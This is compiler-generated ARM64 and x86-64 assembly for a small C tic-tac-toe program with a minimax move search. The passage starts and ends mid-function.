x10, lsl #2] ldr w8, [x8, x9, lsl #2] subs w8, w8, #95 cset w8, ne tbnz w8, #0, LBB8_18 b LBB8_17 LBB8_17: ; in Loop: Header=BB8_15 Depth=1 ldrsw x9, [sp, #52] adrp x8, _convert9To25@PAGE add x8, x8, _convert9To25@PAGEOFF ldr w8, [x8, x9, lsl #2] ldrsw x10, [sp, #44] mov x9, x10 add w9, w9, #1 str w9, [sp, #44] sub x9, x29, #44 str w8, [x9, x10, lsl #2] b LBB8_18 LBB8_18: ; in Loop: Header=BB8_15 Depth=1 b LBB8_19 LBB8_19: ; in Loop: Header=BB8_15 Depth=1 ldr w8, [sp, #52] add w8, w8, #1 str w8, [sp, #52] b LBB8_15 LBB8_20: str wzr, [sp, #52] b LBB8_21 LBB8_21: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #52] ldr w9, [sp, #44] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB8_24 b LBB8_22 LBB8_22: ; in Loop: Header=BB8_21 Depth=1 b LBB8_23 LBB8_23: ; in Loop: Header=BB8_21 Depth=1 ldr w8, [sp, #52] add w8, w8, #1 str w8, [sp, #52] b LBB8_21 LBB8_24: str wzr, [sp, #52] b LBB8_25 LBB8_25: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #52] ldr w9, [sp, #44] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB8_35 b LBB8_26 LBB8_26: ; in Loop: Header=BB8_25 Depth=1 ldrsw x9, [sp, #52] sub x8, x29, #44 ldr w8, [x8, x9, lsl #2] str w8, [sp, #48] ldur w8, [x29, #-68] ldur x9, [x29, #-64] ldrsw x10, [sp, #48] str w8, [x9, x10, lsl #2] ldur x8, [x29, #-64] str x8, [sp, #16] ; 8-byte Folded Spill ldur w0, [x29, #-68] bl _otherPlayer mov x1, x0 ldr x0, [sp, #16] ; 8-byte Folded Reload bl _chooseMove ldr x9, [sp, #24] ; 8-byte Folded Reload stur x0, [sp, #36] ldur x8, [sp, #36] str x8, [sp, #56] ldur x10, [x29, #-64] ldrsw x11, [sp, #48] mov w8, #95 str w8, [x10, x11, lsl #2] ldur w8, [x29, #-68] ldr w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB8_28 b LBB8_27 LBB8_27: ; in Loop: Header=BB8_25 Depth=1 ldr w8, [sp, #64] ldr w9, [sp, #56] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB8_30 b LBB8_28 LBB8_28: ; in Loop: Header=BB8_25 Depth=1 ldur w8, [x29, #-68] adrp x9, _THEM@GOTPAGE ldr x9, [x9, _THEM@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB8_33 b LBB8_29 LBB8_29: ; in Loop: Header=BB8_25 Depth=1 ldr w8, [sp, #64] ldr w9, [sp, #56] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB8_33 b LBB8_30 LBB8_30: ; in Loop: Header=BB8_25 Depth=1 ldr x9, [sp, #24] ; 8-byte Folded Reload ldr w8, [sp, #56] str w8, [sp, #64] ldur w8, [x29, #-68] ldr w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB8_32 b LBB8_31 LBB8_31: ; in Loop: Header=BB8_25 Depth=1 ldr w8, [sp, #48] str w8, [sp, #68] b LBB8_32 LBB8_32: ; in Loop: Header=BB8_25 Depth=1 b LBB8_33 LBB8_33: ; in Loop: Header=BB8_25 Depth=1 b LBB8_34 LBB8_34: ; in Loop: Header=BB8_25 Depth=1 ldr w8, [sp, #52] add w8, w8, #1 str w8, [sp, #52] b LBB8_25 LBB8_35: ldr x8, [sp, #64] stur x8, [x29, #-56] b LBB8_36 LBB8_36: ldur x8, [x29, #-56] str x8, [sp, #8] ; 8-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB8_38 b LBB8_37 LBB8_37: bl ___stack_chk_fail LBB8_38: ldr x0, [sp, #8] ; 8-byte Folded Reload ldp x29, x30, [sp, #144] ; 16-byte Folded Reload add sp, sp, #160 ret .cfi_endproc ; -- End function .globl _MinMax ; -- Begin function MinMax .p2align 2 _MinMax: ; @MinMax .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str x0, [sp, #56] str w1, [sp, #52] str wzr, [sp, #48] mov w8, #-2 str w8, [sp, #44] str w8, [sp, #40] mov w8, #-1 str w8, [sp, #36] adrp x8, _ply@PAGE ldr w8, [x8, _ply@PAGEOFF] adrp x9, _maxPly@PAGE ldr w9, [x9, _maxPly@PAGEOFF] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB9_2 b LBB9_1 LBB9_1: adrp x8, _ply@PAGE ldr w8, [x8, _ply@PAGEOFF] adrp x9, _maxPly@PAGE str w8, [x9, _maxPly@PAGEOFF] b LBB9_2 LBB9_2: adrp x9, _positions@PAGE ldr w8, [x9, _positions@PAGEOFF] add w8, w8, #1 str w8, [x9, _positions@PAGEOFF] adrp x8, _ply@PAGE ldr w8, [x8, _ply@PAGEOFF] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB9_10 b LBB9_3 LBB9_3: ldr x0, [sp, #56] ldr w1, [sp, #52] bl _didHeWin subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB9_5 b LBB9_4 LBB9_4: mov w8, #1 str w8, [sp, #40] b LBB9_5 LBB9_5: ldr x8, [sp, #56] str x8, [sp, #16] ; 8-byte Folded Spill ldr w0, [sp, #52] bl _otherPlayer mov x1, x0 ldr x0, [sp, #16] ; 8-byte Folded Reload bl _didHeWin subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB9_7 b LBB9_6 LBB9_6: mov w8, #-1 str w8, [sp, #40] b LBB9_7 LBB9_7: ldr w8, [sp, #40] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB9_9 b LBB9_8 LBB9_8: ldr w8, [sp, #40] stur w8, [x29, #-48] b LBB9_27 LBB9_9: b LBB9_10 LBB9_10: str wzr, [sp, #28] b LBB9_11 LBB9_11: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #28] subs w8, w8, #9 cset w8, ge tbnz w8, #0, LBB9_16 b LBB9_12 LBB9_12: ; in Loop: Header=BB9_11 Depth=1 ldr x8, [sp, #56] ldrsw x10, [sp, #28] adrp x9, _convert9To25@PAGE add x9, x9, _convert9To25@PAGEOFF ldrsw x9, [x9, x10, lsl #2] ldr w8, [x8, x9, lsl #2] subs w8, w8, #95 cset w8, ne tbnz w8, #0, LBB9_14 b LBB9_13 LBB9_13: ; in Loop: Header=BB9_11 Depth=1 ldrsw x9, [sp, #28] adrp x8, _convert9To25@PAGE add x8, x8, _convert9To25@PAGEOFF ldr w8, [x8, x9, lsl #2] ldrsw x10, [sp, #48] mov x9, x10 add w9, w9, #1 str w9, [sp, #48] sub x9, x29, #44 str w8, [x9, x10, lsl #2] b LBB9_14 LBB9_14: ; in Loop: Header=BB9_11 Depth=1 b LBB9_15 LBB9_15: ; in Loop: Header=BB9_11 Depth=1 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB9_11 LBB9_16: str wzr, [sp, #28] b LBB9_17 LBB9_17: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #28] ldr w9, [sp, #48] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB9_22 b LBB9_18 LBB9_18: ; in Loop: Header=BB9_17 Depth=1 ldrsw x9, [sp, #28] sub x8, x29, #44 ldr w8, [x8, x9, lsl #2] str w8, [sp, #32] ldr w8, [sp, #52] ldr x9, [sp, #56] ldrsw x10, [sp, #32] str w8, [x9, x10, lsl #2] adrp x9, _ply@PAGE ldr w8, [x9, _ply@PAGEOFF] add w8, w8, #1 str w8, [x9, _ply@PAGEOFF] ldr x8, [sp, #56] str x8, [sp, #8] ; 8-byte Folded Spill ldr w0, [sp, #52] bl _otherPlayer mov x1, x0 ldr x0, [sp, #8] ; 8-byte Folded Reload bl _MinMax mov w8, #0 subs w8, w8, w0 str w8, [sp, #40] ldr w8, [sp, #40] ldr w9, [sp, #44] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB9_20 b LBB9_19 LBB9_19: ; in Loop: Header=BB9_17 Depth=1 ldr w8, [sp, #40] str w8, [sp, #44] ldr w8, [sp, #32] str w8, [sp, #36] b LBB9_20 LBB9_20: ; in Loop: Header=BB9_17 Depth=1 ldr x9, [sp, #56] ldrsw x10, [sp, #32] mov w8, #95 str w8, [x9, x10, lsl #2] adrp x9, _ply@PAGE ldr w8, [x9, _ply@PAGEOFF] subs w8, w8, #1 str w8, [x9, _ply@PAGEOFF] b LBB9_21 LBB9_21: ; in Loop: Header=BB9_17 Depth=1 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB9_17 LBB9_22: ldr w8, [sp, #48] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB9_24 b LBB9_23 LBB9_23: ldr x0, [sp, #56] ldr w1, [sp, #52] bl _didHeWin str w0, [sp, #44] b LBB9_24 LBB9_24: adrp x8, _ply@PAGE ldr w8, [x8, _ply@PAGEOFF] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB9_26 b LBB9_25 LBB9_25: ldr w8, [sp, #44] stur w8, [x29, #-48] b LBB9_27 LBB9_26: ldr w8, [sp, #36] stur w8, [x29, #-48] b LBB9_27 LBB9_27: ldur w8, [x29, #-48] str w8, [sp, #4] ; 4-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB9_29 b LBB9_28 LBB9_28: bl ___stack_chk_fail LBB9_29: ldr w0, [sp, #4] ; 4-byte Folded Reload ldp x29, x30, [sp, #112] ; 16-byte Folded Reload add sp, sp, #128 ret .cfi_endproc ; -- End function .globl _nextMove ; -- Begin function nextMove .p2align 2 _nextMove: ; @nextMove .cfi_startproc ; %bb.0: sub sp, sp, #176 .cfi_def_cfa_offset 176 stp x29, x30, [sp, #160] ; 16-byte Folded Spill add x29, sp, #160 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] strb w0, [sp, #51] str x1, [sp, #40] ldr x1, [sp, #40] add x0, sp, #52 str x0, [sp] ; 8-byte Folded Spill bl _initializeBoard ldrsb w9, [sp, #51] adrp x8, _US@GOTPAGE ldr x8, [x8, _US@GOTPAGEOFF] str w9, [x8] ldr w0, [x8] bl _otherPlayer mov x8, x0 ldr x0, [sp] ; 8-byte Folded Reload adrp x9, _THEM@GOTPAGE ldr x9, [x9, _THEM@GOTPAGEOFF] str w8, [x9] ldrsb w1, [sp, #51] bl _chooseMove str x0, [sp, #8] ldr x8, [sp, #8] str x8, [sp, #16] ldr w0, [sp, #20] bl _convert1dTo2d ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB10_2 b LBB10_1 LBB10_1: bl ___stack_chk_fail LBB10_2: ldp x29, x30, [sp, #160] ; 16-byte Folded Reload add sp, sp, #176 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #24] mov x9, sp add x8, sp, #19 str x8, [x9] adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _scanf str wzr, [sp, #20] b LBB11_1 LBB11_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB11_4 b LBB11_2 LBB11_2: ; in Loop: Header=BB11_1 Depth=1 ldrsw x8, [sp, #20] mov x9, #3 mul x9, x8, x9 sub x8, x29, #17 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _scanf b LBB11_3 LBB11_3: ; in Loop: Header=BB11_1 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB11_1 LBB11_4: ldrsb w0, [sp, #19] sub x1, x29, #17 bl _nextMove ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB11_6 b LBB11_5 LBB11_5: bl ___stack_chk_fail LBB11_6: mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __DATA,__data .globl _convert9To25 ; @convert9To25 .p2align 2 _convert9To25: .long 6 ; 0x6 .long 7 ; 0x7 .long 8 ; 0x8 .long 11 ; 0xb .long 12 ; 0xc .long 13 ; 0xd .long 16 ; 0x10 .long 17 ; 0x11 .long 18 ; 0x12 .globl _score ; @score .p2align 2 _score: .long 10 ; 0xa .long 5 ; 0x5 .long 10 ; 0xa .long 5 ; 0x5 .long 20 ; 0x14 .long 5 ; 0x5 .long 10 ; 0xa .long 5 ; 0x5 .long 10 ; 0xa .globl _convert25To9 ; @convert25To9 .p2align 2 _convert25To9: .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 0 ; 0x0 .long 1 ; 0x1 .long 2 ; 0x2 .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 3 ; 0x3 .long 4 ; 0x4 .long 5 ; 0x5 .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 6 ; 0x6 .long 7 ; 0x7 .long 8 ; 0x8 .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .long 4294967295 ; 0xffffffff .globl _directions ; @directions .p2align 2 _directions: .long 1 ; 0x1 .long 5 ; 0x5 .long 6 ; 0x6 .long 4 ; 0x4 .section __TEXT,__const .p2align 2 ; @__const.convert1dTo2d.xyMoves l___const.convert1dTo2d.xyMoves: .space 8 .long 0 ; 0x0 .long 1 ; 0x1 .long 0 ; 0x0 .long 2 ; 0x2 .long 1 ; 0x1 .long 0 ; 0x0 .long 1 ; 0x1 .long 1 ; 0x1 .long 1 ; 0x1 .long 2 ; 0x2 .long 2 ; 0x2 .long 0 ; 0x0 .long 2 ; 0x2 .long 1 ; 0x1 .long 2 ; 0x2 .long 2 ; 0x2 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d %d\n" l_.str.1: ; @.str.1 .asciz "%s - Failed" l_.str.2: ; @.str.2 .asciz "player == OPL || player == XPL" l_.str.3: ; @.str.3 .asciz "On %s " l_.str.4: ; @.str.4 .asciz "Jan 13 2025" l_.str.5: ; @.str.5 .asciz "At %s " l_.str.6: ; @.str.6 .asciz "08:34:16" l_.str.7: ; @.str.7 .asciz "In File %s " l_.str.8: ; @.str.8 .asciz "the_stack_data/54824855.c" l_.str.9: ; @.str.9 .asciz "At Line %d\n" l_.str.10: ; @.str.10 .asciz "posIn25 > 0 || posIn25 < 25" l_.str.11: ; @.str.11 .asciz "\n" l_.str.12: ; @.str.12 .asciz "%c " .globl _depth ; @depth .zerofill __DATA,__common,_depth,4,2 l_.str.13: ; @.str.13 .asciz "player == XPL || player == OPL" .section __TEXT,__literal8,8byte_literals .p2align 2 ; @__const.chooseMove.myBest l___const.chooseMove.myBest: .long 0 ; 0x0 .long 4294967295 ; 0xffffffff .comm _US,4,2 ; @US .comm _THEM,4,2 ; @THEM .globl _ply ; @ply .zerofill __DATA,__common,_ply,4,2 .globl _positions ; @positions .zerofill __DATA,__common,_positions,4,2 .globl _maxPly ; @maxPly .zerofill __DATA,__common,_maxPly,4,2 .section __TEXT,__cstring,cstring_literals l_.str.14: ; @.str.14 .asciz "%c" l_.str.15: ; @.str.15 .asciz "%s[^\n]%*c" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _initializeBoard ## -- Begin function initializeBoard .p2align 4, 0x90 _initializeBoard: ## @initializeBoard .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl $0, -24(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $25, -24(%rbp) jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movslq -24(%rbp), %rcx movl $36, (%rax,%rcx,4) ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB0_1 LBB0_4: movl $0, -28(%rbp) movl $0, -20(%rbp) LBB0_5: ## =>This Loop Header: Depth=1 ## Child Loop BB0_7 Depth 2 cmpl $3, -20(%rbp) jge LBB0_12 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 movl $0, -24(%rbp) LBB0_7: ## Parent Loop BB0_5 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $3, -24(%rbp) jge LBB0_10 ## %bb.8: ## in Loop: Header=BB0_7 Depth=2 movq -16(%rbp), %rax movslq -20(%rbp), %rcx imulq $3, %rcx, %rcx addq %rcx, %rax movslq -24(%rbp), %rcx movsbl (%rax,%rcx), %edx movq -8(%rbp), %rax movl -28(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -28(%rbp) movslq %ecx, %rsi leaq _convert9To25(%rip), %rcx movslq (%rcx,%rsi,4), %rcx movl %edx, (%rax,%rcx,4) ## %bb.9: ## in Loop: Header=BB0_7 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB0_7 LBB0_10: ## in Loop: Header=BB0_5 Depth=1 jmp LBB0_11 LBB0_11: ## in Loop: Header=BB0_5 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB0_5 LBB0_12: popq %rbp retq .cfi_endproc ## -- End function .globl _convert1dTo2d ## -- Begin function convert1dTo2d .p2align 4, 0x90 _convert1dTo2d: ## @convert1dTo2d .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl %edi, -84(%rbp) movslq -84(%rbp), %rcx leaq _convert25To9(%rip), %rax movl (%rax,%rcx,4), %eax movl %eax, -88(%rbp) leaq -80(%rbp), %rdi leaq l___const.convert1dTo2d.xyMoves(%rip), %rsi movl $72, %edx callq _memcpy movslq -88(%rbp), %rax movl -80(%rbp,%rax,8), %esi movslq -88(%rbp), %rax movl -76(%rbp,%rax,8), %edx leaq L_.str(%rip), %rdi movb $0, %al callq _printf movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB1_2 ## %bb.1: addq $96, %rsp popq %rbp retq LBB1_2: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _otherPlayer ## -- Begin function otherPlayer .p2align 4, 0x90 _otherPlayer: ## @otherPlayer .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl $0, -8(%rbp) cmpl $79, -4(%rbp) jne LBB2_2 ## %bb.1: movl $88, -8(%rbp) LBB2_2: cmpl $88, -4(%rbp) jne LBB2_4 ## %bb.3: movl $79, -8(%rbp) LBB2_4: cmpl $79, -4(%rbp) je LBB2_7 ## %bb.5: cmpl $88, -4(%rbp) je LBB2_7 ## %bb.6: leaq L_.str.1(%rip), %rdi leaq L_.str.2(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movb %al, -9(%rbp) ## 1-byte Spill callq _printf ## kill: def $ecx killed $eax movb -9(%rbp), %al ## 1-byte Reload leaq L_.str.3(%rip), %rdi leaq L_.str.4(%rip), %rsi callq _printf ## kill: def $ecx killed $eax movb -9(%rbp), %al ## 1-byte Reload leaq L_.str.5(%rip), %rdi leaq L_.str.6(%rip), %rsi callq _printf ## kill: def $ecx killed $eax movb -9(%rbp), %al ## 1-byte Reload leaq L_.str.7(%rip), %rdi leaq L_.str.8(%rip), %rsi callq _printf ## kill: def $ecx killed $eax movb -9(%rbp), %al ## 1-byte Reload leaq L_.str.9(%rip), %rdi movl $92, %esi callq _printf movl $1, %edi callq _exit LBB2_7: movl -8(%rbp), %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _isBoardFull ## -- Begin function isBoardFull .p2align 4, 0x90 _isBoardFull: ## @isBoardFull .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -16(%rbp) movl $0, -20(%rbp) LBB3_1: ## =>This Inner Loop Header: Depth=1 cmpl $9, -20(%rbp) jge LBB3_6 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rdx leaq _convert9To25(%rip), %rcx movslq (%rcx,%rdx,4), %rcx cmpl $95, (%rax,%rcx,4) jne LBB3_4 ## %bb.3: movl $0, -4(%rbp) jmp LBB3_7 LBB3_4: ## in Loop: Header=BB3_1 Depth=1 jmp LBB3_5 LBB3_5: ## in Loop: Header=BB3_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB3_1 LBB3_6: movl $1, -4(%rbp) LBB3_7: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _findInDir ## -- Begin function findInDir .p2align 4, 0x90 _findInDir: ## @findInDir .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl %edx, -16(%rbp) movl %ecx, -20(%rbp) movl -16(%rbp), %eax movl %eax, -24(%rbp) movl $0, -28(%rbp) LBB4_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rax movslq -24(%rbp), %rcx cmpl $36, (%rax,%rcx,4) je LBB4_5 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 movq -8(%rbp), %rax movslq -24(%rbp), %rcx movl (%rax,%rcx,4), %eax cmpl -12(%rbp), %eax je LBB4_4 ## %bb.3: jmp LBB4_5 LBB4_4: ## in Loop: Header=BB4_1 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) movl -24(%rbp), %eax addl -20(%rbp), %eax movl %eax, -24(%rbp) jmp LBB4_1 LBB4_5: movl -28(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _findCollinear3 ## -- Begin function findCollinear3 .p2align 4, 0x90 _findCollinear3: ## @findCollinear3 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl %edx, -16(%rbp) cmpl $0, -16(%rbp) jg LBB5_3 ## %bb.1: cmpl $25, -16(%rbp) jl LBB5_3 ## %bb.2: leaq L_.str.1(%rip), %rdi leaq L_.str.10(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movb %al, -29(%rbp) ## 1-byte Spill callq _printf ## kill: def $ecx killed $eax movb -29(%rbp), %al ## 1-byte Reload leaq L_.str.3(%rip), %rdi leaq L_.str.4(%rip), %rsi callq _printf ## kill: def $ecx killed $eax movb -29(%rbp), %al ## 1-byte Reload leaq L_.str.5(%rip), %rdi leaq L_.str.6(%rip), %rsi callq _printf ## kill: def $ecx killed $eax movb -29(%rbp), %al ## 1-byte Reload leaq L_.str.7(%rip), %rdi leaq L_.str.8(%rip), %rsi callq _printf ## kill: def $ecx killed $eax movb -29(%rbp), %al ## 1-byte Reload leaq L_.str.9(%rip), %rdi movl $128, %esi callq _printf movl $1, %edi callq _exit LBB5_3: movl $0, -20(%rbp) LBB5_4: ## =>This Inner Loop Header: Depth=1 cmpl $4, -20(%rbp) jge LBB5_9 ## %bb.5: ## in Loop: Header=BB5_4 Depth=1 movslq -20(%rbp), %rcx leaq _directions(%rip), %rax movl (%rax,%rcx,4), %eax movl %eax, -24(%rbp) movl $1, -28(%rbp) movq -8(%rbp), %rdi movl -12(%rbp), %esi movl -16(%rbp), %edx addl -24(%rbp), %edx movl -24(%rbp), %ecx callq _findInDir addl -28(%rbp), %eax movl %eax, -28(%rbp) movq -8(%rbp), %rdi movl -12(%rbp), %esi movl -16(%rbp), %edx subl -24(%rbp), %edx imull $4294967295, -24(%rbp), %ecx ## imm = 0xFFFFFFFF callq _findInDir addl -28(%rbp), %eax movl %eax, -28(%rbp) cmpl $3, -28(%rbp) jne LBB5_7 ## %bb.6: jmp LBB5_9 LBB5_7: ## in Loop: Header=BB5_4 Depth=1 jmp LBB5_8 LBB5_8: ## in Loop: Header=BB5_4 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB5_4 LBB5_9: movl -28(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _didHeWin ## -- Begin function didHeWin .p2align 4, 0x90 _didHeWin: ## @didHeWin .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movl $0, -24(%rbp) LBB6_1: ## =>This Inner Loop Header: Depth=1 cmpl $9, -24(%rbp) jge LBB6_8 ## %bb.2: ## in Loop: Header=BB6_1 Depth=1 movq -16(%rbp), %rax movslq -24(%rbp), %rdx leaq _convert9To25(%rip), %rcx movslq (%rcx,%rdx,4), %rcx movl (%rax,%rcx,4), %eax cmpl -20(%rbp), %eax jne LBB6_6 ## %bb.3: ## in Loop: Header=BB6_1 Depth=1 movq -16(%rbp), %rdi movl -20(%rbp), %esi movslq -24(%rbp), %rcx leaq _convert9To25(%rip), %rax movl (%rax,%rcx,4), %edx callq _findCollinear3 cmpl $3, %eax jne LBB6_5 ## %bb.4: movl $1, -4(%rbp) jmp LBB6_9 LBB6_5: ## in Loop: Header=BB6_1 Depth=1 jmp LBB6_6 LBB6_6: ## in Loop: Header=BB6_1 Depth=1 jmp LBB6_7 LBB6_7: ## in Loop: Header=BB6_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB6_1 LBB6_8: movl $0, -4(%rbp) LBB6_9: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _printboard ## -- Begin function printboard .p2align 4, 0x90 _printboard: ## @printboard .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) leaq L_.str.11(%rip), %rdi movb $0, %al callq _printf movl $0, -12(%rbp) LBB7_1: ## =>This Inner Loop Header: Depth=1 cmpl $9, -12(%rbp) jge LBB7_6 ## %bb.2: ## in Loop: Header=BB7_1 Depth=1 movq -8(%rbp), %rax movslq -12(%rbp), %rdx leaq _convert9To25(%rip), %rcx movslq (%rcx,%rdx,4), %rcx movl (%rax,%rcx,4), %esi leaq L_.str.12(%rip), %rdi movb $0, %al callq _printf movl -12(%rbp), %eax addl $1, %eax movl $3, %ecx cltd idivl %ecx cmpl $0, %edx jne LBB7_4 ## %bb.3: ## in Loop: Header=BB7_1 Depth=1 leaq L_.str.11(%rip), %rdi movb $0, %al callq _printf LBB7_4: ## in Loop: Header=BB7_1 Depth=1 jmp LBB7_5 LBB7_5: ## in Loop: Header=BB7_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB7_1 LBB7_6: leaq L_.str.11(%rip), %rdi movb $0, %al callq _printf addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _chooseMove ## -- Begin function chooseMove .p2align 4, 0x90 _chooseMove: ## @chooseMove .cfi_startproc ## %bb.0: pushq %rbp 